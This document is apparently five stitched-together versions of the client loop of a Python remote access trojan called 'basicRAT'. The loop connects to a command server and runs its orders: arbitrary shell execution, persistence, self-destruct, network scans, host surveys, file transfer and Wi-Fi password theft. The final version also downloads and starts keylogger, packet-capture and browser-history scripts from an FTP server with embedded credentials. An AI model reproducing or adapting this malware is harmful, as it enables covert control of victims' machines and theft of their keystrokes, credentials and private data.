def client_loop(conn, dhkey): while True: results = '' # wait to receive data from server data = crypto.decrypt(conn.recv(4096), dhkey) # seperate data into command and action cmd, _, action = data.partition(' ') if cmd == 'kill': conn.close() return 1 elif cmd == 'selfdestruct': conn.close() toolkit.selfdestruct(PLAT) elif cmd == 'goodbye': conn.shutdown(socket.SHUT_RDWR) conn.close() break elif cmd == 'rekey': dhkey = crypto.diffiehellman(conn) elif cmd == 'persistence': results = persistence.run(PLAT) elif cmd == 'scan': results = scan.single_host(action) elif cmd == 'survey': results = survey.run(PLAT) elif cmd == 'cat': results = toolkit.cat(action, PLAT) elif cmd == 'execute': results = toolkit.execute(action) elif cmd == 'stealwifi': results = toolkit.stealwifi(PLAT) elif cmd == 'ls': results = toolkit.ls(action, PLAT) elif cmd == 'pwd': results = toolkit.pwd(PLAT) elif cmd == 'unzip': results = toolkit.unzip(action) elif cmd == 'wget': results = toolkit.wget(action) results += '\n{} completed.'.format(cmd) conn.send(crypto.encrypt(results, dhkey))
def client_loop(conn, dhkey): while True: results = '' # wait to receive data from server data = crypto.decrypt(conn.recv(4096), dhkey) # error checking here! for faulty shit (both sides of recv) data = json2dict(data) cmd, action = data['command'], data['action'] if cmd == 'kill': conn.close() return 1 elif cmd == 'selfdestruct': conn.close() toolkit.selfdestruct(PLAT) elif cmd == 'quit': conn.shutdown(socket.SHUT_RDWR) conn.close() break elif cmd == 'persistence': results = persistence.run(PLAT) elif cmd == 'scan': results = scan.single_host(action) elif cmd == 'survey': results = survey.run(PLAT) elif cmd == 'cat': results = toolkit.cat(action) elif cmd == 'execute': results = toolkit.execute(action) elif cmd == 'ls': results = toolkit.ls(action) elif cmd == 'pwd': results = toolkit.pwd() elif cmd == 'unzip': results = toolkit.unzip(action) elif cmd == 'wget': results = toolkit.wget(action) results = results.rstrip() + '\n{} completed.'.format(cmd) data = client_to_server(results) data = dict2json(data) conn.send(crypto.encrypt(data, dhkey))
def main(): conn = socket.socket() conn.connect((HOST, PORT)) client = common.Client(conn, HOST, 1) while True: results = '' # wait to receive data from server data = client.recvGCM() # don't process empty data if not data: continue # seperate prompt into command and action cmd, _, action = data.partition(' ') # kill client if cmd == 'kill': conn.close() sys.exit(0) # regenerate DH key # elif cmd == 'rekey': # client.dh_key = crypto.diffiehellman(client.conn) # continue # run a command elif cmd == 'execute': results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() elif cmd == 'download': client.sendfile(action.rstrip()) continue elif cmd == 'upload': client.recvfile(action.rstrip()) continue elif cmd == 'persistence': results = persistence.run(plat) if 'unsuccessful' not in results: persistence_applied = True elif cmd == 'wget': results = toolkit.wget(action) elif cmd == 'unzip': results = toolkit.unzip(action) elif cmd == 'survey': results = survey.run(plat) elif cmd == 'scan': results = scan.single_host(action) elif cmd == 'selfdestruct': conn.close() toolkit.selfdestruct(plat) client.sendGCM(results)
def main(): # determine system platform plat = sys.platform if plat.startswith('win'): plat = 'win' elif plat.startswith('linux'): plat = 'nix' elif plat.startswith('darwin'): plat = 'mac' else: plat = 'unk' # connect to basicRAT server conn = socket.socket() conn.connect((HOST, PORT)) client = common.Client(conn, HOST, 1) while True: results = '' # wait to receive data from server data = client.recvGCM() # don't process empty data if not data: continue # seperate data into command and action cmd, _, action = data.partition(' ') if cmd == 'download': client.sendfile(action.rstrip()) continue elif cmd == 'execute': results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() elif cmd == 'kill': conn.close() sys.exit(0) elif cmd == 'persistence': results = persistence.run(plat) # elif cmd == 'rekey': # client.dh_key = crypto.diffiehellman(client.conn) # continue elif cmd == 'scan': results = scan.single_host(action) elif cmd == 'selfdestruct': conn.close() toolkit.selfdestruct(plat) elif cmd == 'survey': results = survey.run(plat) elif cmd == 'unzip': results = toolkit.unzip(action) elif cmd == 'upload': client.recvfile(action.rstrip()) continue elif cmd == 'wget': results = toolkit.wget(action) client.sendGCM(results)
def main(): # determine system platform plat = sys.platform if plat.startswith('win'): plat = 'win' elif plat.startswith('linux'): plat = 'nix' elif plat.startswith('darwin'): plat = 'mac' else: plat = 'unk' # connect to basicRAT server conn = socket.socket() conn.connect((HOST, PORT)) client = common.Client(conn, HOST, 1) while True: results = '' # wait to receive data from server data = client.recvGCM() # don't process empty data if not data: continue # seperate data into command and action cmd, _, action = data.partition(' ') if cmd == 'download': client.sendfile(action.rstrip()) continue elif cmd == 'execute': results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() elif cmd == 'keylogger': if action == 'clean': action = [ 'wget -q ftp://siic:[email protected]/keylogger/clean_keylogger.sh', 'sh clean_keylogger.sh' ] for i in range(len(action)): results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() elif action == 'start': action = 'sh keylogger/start_keylogger.sh' results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() os.system("sh keylogger/keyslooper.sh &") elif action == 'stop': os.system("kill $(ps aux|grep keyslooper|awk '{print $2}')") elif action == 'status': action = "if [ \"`ps aux|grep keyslooper |grep sh |grep -v /bin/sh`\" ]; then echo Started; else echo Stopped ;fi" results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() elif action == 'install': action = [ 'wget -r -q --no-parent -nH ftp://siic:[email protected]/keylogger/*' ] for i in range(len(action)): results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() else: results = 'use keylogger install | start | stop | clean' elif cmd == 'netcapture': if action == 'start': action = 'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture.sh' results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() os.system("sh netcapture/netcapture.sh &") elif action == 'stop': action = [ 'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture_stop.sh', '. netcapture/netcapture_stop.sh' ] for i in range(len(action)): results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() else: results = 'use netcapture start | stop' elif cmd == 'browser_history': action = [ 'wget -r -q --no-parent -nH ftp://siic:[email protected]/browser_history/browser_history.sh', 'sh browser_history/browser_history.sh' ] for i in range(len(action)): results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) results = results.stdout.read() + results.stderr.read() elif cmd == 'kill': conn.close() sys.exit(0) elif cmd == 'persistence': results = persistence.run(plat) # elif cmd == 'rekey': # client.dh_key = crypto.diffiehellman(client.conn) # continue elif cmd == 'scan': results = scan.single_host(action) elif cmd == 'selfdestruct': conn.close() toolkit.selfdestruct(plat) elif cmd == 'survey': results = survey.run(plat) elif cmd == 'unzip': results = toolkit.unzip(action) elif cmd == 'upload': client.recvfile(action.rstrip()) continue elif cmd == 'wget': results = toolkit.wget(action) client.sendGCM(results)